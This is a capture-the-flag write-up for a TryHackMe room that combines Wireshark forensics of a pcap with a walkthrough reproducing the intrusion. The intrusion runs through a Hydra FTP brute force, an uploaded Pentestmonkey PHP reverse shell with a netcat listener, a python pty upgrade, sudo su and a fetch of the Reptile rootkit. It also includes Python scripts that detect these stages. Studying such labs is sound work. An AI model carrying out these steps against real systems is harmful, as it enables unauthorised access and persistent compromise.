THM writeup: h4cked

Earlier this week I developed a Try Hack Me room called “h4cked”. The room combines network forensics with basic penetration testing skills. You can find it here:

https://tryhackme.com/jr/h4cked

Scenario – Task 1:

“It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.”

This task can be solved in numerous ways: Wireshark can display specific information based on display filters, or you can simply read the Protocol and Info columns.

# The attacker is trying to log into a specific service. What service is this?

The first network packets show a series of requests to port 21. By right-clicking on the first network packet, it is possible to follow the TCP stream and see exactly what is happening during these requests. The TCP stream confirms that the attacker is trying to log on to FTP. The protocol is also listed as “FTP” in Wireshark.

Answer: FTP

# There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

https://github.com/vanhauser-thc/thc-hydra

Answer: Hydra

# The attacker is trying to log on with a specific username. What is the username?

When right-clicking the first network packet and following the TCP stream (as demonstrated in the first question), the user “jenny” appears in the login requests. Alternatively, filter on FTP in Wireshark: the Info column will then display “Request: USER jenny” a series of times.

Answer: Jenny

# What is the user’s password?

Packet number 305 shows an FTP “230 Login successful” response. By following the TCP stream, the password is displayed.

# What is the current FTP working directory after the attacker logged in?

Packet number 401 shows the current working directory, as the attacker executed the “PWD” command.

Answer: /var/www/html

# The attacker uploaded a backdoor. What is the backdoor’s filename?

Packet number 425 and onwards show that the attacker uploaded the shell.php file and executed chmod 777 to change its permissions.

Once again, several of the answers above can be found by following the TCP stream, rather than inspecting the network packets one by one.

Answer: shell.php

# The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

When uploading files, the protocol is listed as FTP-DATA in Wireshark (packet number 431), rather than “plain” FTP. Once again, following the TCP stream will show the full contents of the shell.php file. The origin is from Pentestmonkey’s website.

Answer: http://pentestmonkey.net/tools/php-reverse-shell
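As an added example that is not part of the original writeup, the FTP questions above (service, username, failed and successful logins, working directory, uploaded file and chmod) can also be answered by parsing the control channel the way an analyst reads it in Follow TCP Stream. The stream below is constructed for illustration (not the room's pcap, and the passwords are made up), and the triage_ftp_stream and findings functions are my own, assuming “>” marks client commands and “<” marks server replies.

```python
from collections import Counter
# Constructed FTP control-channel conversation, laid out the way Wireshark's "Follow
# TCP Stream" shows it (">" client to server, "<" server reply). Not the room's pcap.
SAMPLE_STREAM = """\
> USER jenny
> PASS password
< 530 Login incorrect.
> USER jenny
> PASS 123456
< 530 Login incorrect.
> USER jenny
> PASS letmein
< 230 Login successful.
> PWD
< 257 "/var/www/html" is the current directory
> STOR shell.php
> SITE CHMOD 777 shell.php
"""

def triage_ftp_stream(stream):
    """Reconstruct the attacker timeline from FTP commands and reply codes."""
    r = {"failed_logins": 0, "usernames": Counter(), "login_success": False,
         "cwd": None, "uploads": [], "chmod": []}
    for line in stream.splitlines():
        direction, _, payload = line.partition(" ")
        if direction == ">":                        # client command
            cmd, _, arg = payload.partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                r["usernames"][arg] += 1
            elif cmd == "STOR":                     # file upload
                r["uploads"].append(arg)
            elif cmd == "SITE" and arg.upper().startswith("CHMOD"):
                r["chmod"].append(arg.split(None, 1)[1])
        elif direction == "<":                      # server reply code
            if payload.startswith("530"):           # login failed
                r["failed_logins"] += 1
            elif payload.startswith("230"):         # login succeeded
                r["login_success"] = True
            elif payload.startswith("257"):         # PWD reply quotes the path
                r["cwd"] = payload.split('"')[1] if '"' in payload else None
    return r

def findings(r):
    # Turn the parsed timeline into alert-style findings for an analyst.
    out = []
    if r["failed_logins"] >= 2 and r["login_success"]:
        out.append("password brute force followed by successful login")
    if r["cwd"] and r["cwd"].startswith("/var/www") and r["uploads"]:
        out.append("upload into web root: " + ", ".join(r["uploads"]))
    return out
```

The same two findings (repeated 530 replies before a 230, then a STOR into /var/www/html) are exactly what the Wireshark walkthrough above surfaces by hand.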

# Which command did the attacker manually execute after getting a reverse shell?

For the rest of the questions throughout this task, following the TCP stream from packet number 452 will reveal the attacker’s interaction with the system.

Answer: whoami

# What is the computer’s hostname?

Packet number 452 TCP stream.

Answer: wir3

# Which command did the attacker execute to spawn a new TTY shell?

Packet number 452 TCP stream.

Answer: python3 -c 'import pty; pty.spawn("/bin/bash")'

# Which command was executed to gain a root shell?

Packet number 452 TCP stream.

Answer: sudo su

# The attacker downloaded something from GitHub. What is the name of the GitHub project?

The TCP stream from packet number 452 shows that the attacker issued the git clone command to download the project “Reptile”.

Answer: Reptile

# The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

The “About” section of the official Reptile GitHub repository lists Reptile as an LKM Linux rootkit: https://github.com/f0rb1dd3n/Reptile

Answer: Rootkit
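As an added example that is not the writeup's own code, the following detection logic classifies a reverse-shell transcript such as the one followed from packet number 452 into attack stages (recon, TTY upgrade, privilege escalation, rootkit fetch). The transcript below is constructed for illustration and is not from the room's pcap; the rule names and the triage_session function are my own.

```python
import re

# Constructed transcript of the attacker's reverse-shell session, as it appears when
# the TCP stream is followed in Wireshark. Illustrative only, not the room's pcap.
SESSION = """\
whoami
www-data
hostname
wir3
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@wir3:/var/www/html$ su jenny
Password:
jenny@wir3:/var/www/html$ sudo su
root@wir3:/var/www/html# cd /root
root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git
"""

# Ordered (stage, pattern) rules; the first matching rule classifies a line.
RULES = [
    ("tty_upgrade",   re.compile(r"pty\.spawn|script\s+/dev/null")),
    ("priv_esc",      re.compile(r"(^|\s)(sudo\s+su|sudo\s+-i|su\s+\w+)(\s|$)")),
    ("rootkit_fetch", re.compile(r"git\s+clone\s+\S*/(Reptile)\b", re.I)),
    ("recon",         re.compile(r"^(whoami|hostname|id|uname)(\s|$)")),
]
# Once a TTY exists the lines carry a shell prompt; strip it before matching.
PROMPT = re.compile(r"^\S+@\S+:\S+[$#] ")

def triage_session(text):
    """Return (line_no, stage, command) for every transcript line matching a rule."""
    timeline = []
    for n, raw in enumerate(text.splitlines(), 1):
        cmd = PROMPT.sub("", raw).strip()
        for stage, pat in RULES:
            if pat.search(cmd):
                timeline.append((n, stage, cmd))
                break
    return timeline
```

Command output lines (www-data, wir3, Password:) match no rule and are left out of the timeline, so the result reads as the ordered sequence of attacker actions the questions above walk through.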

Scenario – Task 2:

“The attacker has changed the user’s password! Can you replicate the attacker’s steps and read the flag.txt? The flag is located in the /root/Reptile directory. Remember, you can always look back at the .pcap file if necessary. Good luck!”

Use hydra to attack FTP using the rockyou.txt word list.

Download Pentestmonkey’s shell (http://pentestmonkey.net/tools/php-reverse-shell). If you are using Kali, the web shell is already located on the machine as /usr/share/webshells/php/php-reverse-shell.php. Change the IP address and port values in the script: the IP address is your attack box (tun0 interface), and the port can be any port that is not in use on your machine. The reverse shell was saved as reverse.php.

Connect to the FTP service with username jenny and password 987654321. Use put reverse.php to upload your reverse shell and chmod 777 reverse.php to change its permissions. Exit the service.

Create a netcat listener on the designated port. Use curl (or even a web browser) to execute the reverse shell. Spawn a new TTY by running python3 -c 'import pty; pty.spawn("/bin/bash")'. From here on, the attacker can use su jenny and sudo su to become root, as the password is already known. Read the flag.txt file in the /root/Reptile directory.